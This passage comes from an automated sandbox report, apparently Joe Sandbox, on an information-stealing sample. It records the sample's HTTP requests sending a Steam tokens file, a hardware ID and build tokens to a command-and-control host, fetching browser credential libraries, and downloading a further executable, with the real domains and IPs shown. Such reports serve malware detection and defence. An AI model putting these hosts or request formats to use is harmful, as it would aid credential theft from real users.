48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 70 59 30 31 35 77 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 2d 2d 0d 0a Data Ascii: ------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="file_data"pY015w==------CBKJKJDBFIIDHJKEHJEH--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: kasm.zubairgul.comContent-Length: 113593Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="mode"5------KEGIDHJKKJDGCBGCGIJK--
Source: global traffic HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKKJEBFIDAEBFHIDAEBHost: kasm.zubairgul.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 38 35 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 4b 4a 45 42 46 49 44 41 45 42 46 48 49 44 41 45 42 2d 2d 0d 0a Data Ascii: ------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="mode"51------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="task_id"1285492------FBKKJEBFIDAEBFHIDAEBContent-Disposition: form-data; name="status"1------FBKKJEBFIDAEBFHIDAEB--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKECAFIDAFIECBKEHDHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 66 65 32 32 63 30 65 66 62 34 65 32 31 39 63 66 62 39 65 38 36 31 31 66 34 66 66 61 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 43 41 46 49 44 41 46 49 45 43 42 4b 45 48 44 2d 2d 0d 0a Data Ascii: ------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="token"85fe22c0efb4e219cfb9e8611f4ffaaa------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------JEBKECAFIDAFIECBKEHDContent-Disposition: form-data; name="mode"6------JEBKECAFIDAFIECBKEHD--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: cowod.hopto.orgContent-Length: 5765Connection: Keep-AliveCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View IP Address: 95.164.90.97 95.164.90.97
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:51294 -> 147.45.44.104:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_00406963
Source: global traffic HTTP traffic detected: GET /maslengdsa HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=39cb6e9105874f5520345b5c; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25489Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 08 Oct 2024 00:45:50 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-ControlKC equals www.youtube.com (Youtube)
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: kasm.zubairgul.com
Source: global traffic DNS traffic detected: DNS query: nsdm.cumpar-auto-orice-tip.ro
Source: global traffic DNS traffic detected: DNS query: exemplarou.sbs
Source: global traffic DNS traffic detected: DNS query: frizzettei.sbs
Source: global traffic DNS traffic detected: DNS query: isoplethui.sbs
Source: global traffic DNS traffic detected: DNS query: bemuzzeki.sbs
Source: global traffic DNS traffic detected: DNS query: exilepolsiy.sbs
Source: global traffic DNS traffic detected: DNS query: laddyirekyi.sbs
Source: global traffic DNS traffic detected: DNS query: invinjurhey.sbs
Source: global traffic DNS traffic detected: DNS query: wickedneatr.sbs
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: cowod.hopto.org
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKHost: kasm.zubairgul.comContent-Length: 255Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 46 30 30 46 35 44 36 35 43 45 31 36 35 30 34 34 35 35 32 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="hwid"1F00F5D65CE1650445529-a33c7340-61ca------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------KEGIDHJKKJDGCBGCGIJK--
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.HIDAEB
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org/
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.orgAEB
Source: T2bmenoX1o.exe, 00000000.00000002.1811230468.0000000000DDD000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hoptoJKFHCAE
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.multipart/form-data;
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
